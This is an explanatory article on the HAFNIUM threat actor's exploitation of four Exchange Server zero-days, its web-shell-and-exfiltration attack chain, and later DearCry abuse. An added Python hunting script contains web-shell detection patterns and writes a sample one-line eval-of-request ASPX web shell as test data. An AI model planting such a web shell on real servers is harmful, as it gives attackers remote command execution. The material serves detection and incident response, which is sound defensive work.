HAFNIUM Description

HAFNIUM is the designation Microsoft gave to a previously untracked threat actor that it assesses to be state-sponsored and operating out of China. The group's operations show a high level of tradecraft and sophistication. Its primary goal has been the exfiltration of sensitive data from organizations in the United States, spread across multiple sectors: law firms, higher education institutions, infectious disease researchers, policy think tanks, defense contractors, and NGOs (non-governmental organizations). Although the actor is based in China, it conducts its operations largely from leased VPS (virtual private servers) located in the United States, which makes its traffic harder to distinguish from legitimate domestic activity.

Microsoft's analysts had been tracking HAFNIUM for some time before going public with their findings in the wake of the actor's most recent campaign. In that campaign HAFNIUM exploited four zero-day vulnerabilities in on-premises Microsoft Exchange Server, tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. Chained together, these flaws let an attacker who could reach the server over HTTPS authenticate as the Exchange server itself and then write arbitrary files to disk, which is how the web shells described below were dropped. The weaknesses were severe enough that Microsoft released out-of-band security updates for all supported Exchange Server versions; Exchange Online was not affected.

The attack chain of this HAFNIUM operation has three steps. First, the attackers gain access to the target, either by exploiting the four zero-days or by using stolen credentials. Once inside, they drop a web shell into a web-accessible directory on the Exchange server, giving them remote command execution over HTTPS. In the last step, the actor uses that access to read email accounts and to download the Exchange offline address book, which contains information about the victim organization and its users. The selected data is packed into archive files such as .7z and .zip and then exfiltrated. In past campaigns, HAFNIUM has frequently uploaded data collected from victims to third-party file-sharing services such as MEGA.
The web shell also gives the actor a channel to deposit additional malware payloads on the compromised server, most likely to preserve access to the victim's environment.
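The two on-host artifacts that the chain above leaves behind, a dropped ASPX web shell in an IIS web directory and freshly created .7z/.zip archives staged for exfiltration, are what a responder should hunt for first. The following script is an added example, not code from the original page or from Microsoft; it runs against a constructed sample tree so it works offline, and the directory names, the benign page, the one-line web shell body and the archive contents are assumptions for illustration rather than Microsoft's published indicators. The web shell pattern it looks for (a request parameter passed straight to eval, the China Chopper style) is general to single-file ASPX shells, not specific to this campaign.

```python
"""Hunt for dropped ASPX web shells and recently created exfil archives.

Added example, not part of the original page. Sample files are constructed
inline so the script runs offline; paths and contents are illustrative
assumptions, not published indicators of compromise.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Content patterns typical of single-file ASPX web shells: a request parameter
# passed directly to eval() (China Chopper style), or server-side code that
# spawns a process from request input.
SHELL_PATTERNS = {
    "eval_of_request": re.compile(r"eval\s*\(\s*Request", re.I),
    "process_start": re.compile(r'runat\s*=\s*"server".*?Process(StartInfo)?\b', re.I | re.S),
}
ARCHIVE_EXT = {".7z", ".zip"}


def scan_webshells(root: Path):
    """Return [(relative_path, [matched_pattern_names])] for every .aspx under
    root whose content matches at least one web-shell pattern."""
    hits = []
    for p in root.rglob("*.aspx"):
        text = p.read_text(errors="ignore")
        names = [n for n, pat in SHELL_PATTERNS.items() if pat.search(text)]
        if names:
            hits.append((p.relative_to(root).as_posix(), names))
    return sorted(hits)


def find_recent_archives(root: Path, max_age_s: float, now=None):
    """Return relative paths of .7z/.zip files modified within max_age_s seconds."""
    now = time.time() if now is None else now
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file()
        and p.suffix.lower() in ARCHIVE_EXT
        and now - p.stat().st_mtime <= max_age_s
    )


def build_sample_tree() -> Path:
    """Constructed sample data (not real captured files): a benign OWA logon
    page, a one-line web shell dropped under aspnet_client, a fresh staging
    archive, and a week-old archive that must not be flagged."""
    root = Path(tempfile.mkdtemp(prefix="exchange_hunt_"))
    owa = root / "FrontEnd" / "HttpProxy" / "owa" / "auth"
    owa.mkdir(parents=True)
    (owa / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<html><body><form runat="server">'
        '<asp:TextBox id="username" runat="server"/></form></body></html>\n'
    )
    dropped = root / "aspnet_client"
    dropped.mkdir()
    # Assumed web shell body: eval of an attacker-chosen request parameter.
    (dropped / "error.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>\n'
    )
    staging = root / "Temp"
    staging.mkdir()
    (staging / "mailboxes.7z").write_bytes(b"7z\xbc\xaf\x27\x1c" + b"\x00" * 32)
    old = staging / "backup-2019.zip"
    old.write_bytes(b"PK\x03\x04" + b"\x00" * 32)
    week_ago = time.time() - 7 * 24 * 3600
    os.utime(old, (week_ago, week_ago))  # age the benign archive by a week
    return root


def run_hunt(root: Path, max_archive_age_s: float = 24 * 3600):
    """Run both checks and return one report dict."""
    return {
        "webshells": scan_webshells(root),
        "recent_archives": find_recent_archives(root, max_archive_age_s),
    }


if __name__ == "__main__":
    report = run_hunt(build_sample_tree())
    for kind, items in report.items():
        print(f"{kind}:")
        for item in items:
            print("  ", item)
```

On a real server you would point `run_hunt` at the IIS web roots and the Exchange installation directory rather than a temporary tree, and treat any .aspx that is not part of a known-good file inventory as suspect even if it matches no pattern, since web shells are easy to obfuscate past content signatures. Archive creation is a weaker signal on its own; it becomes useful when correlated with the web shell's first-seen time and with outbound transfers to file-sharing services.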

Customers running on-premises Exchange Server are strongly encouraged to install the security updates released by Microsoft and to review the company's security blog, where numerous IoCs (indicators of compromise) have been published. Note that patching closes the entry point but does not remove a web shell that is already on the server, so servers that were exposed before the update should also be checked against those indicators.

Once the HAFNIUM attack became public, it did not take long for other groups to start abusing the same four zero-day vulnerabilities in their own operations. Just nine days after the exploits were revealed, Microsoft detected that a threat actor had begun deploying a new strain of ransomware called DearCry on unpatched Exchange servers, showing how quickly cybercriminals now adapt their infrastructure to incorporate newly disclosed security weaknesses.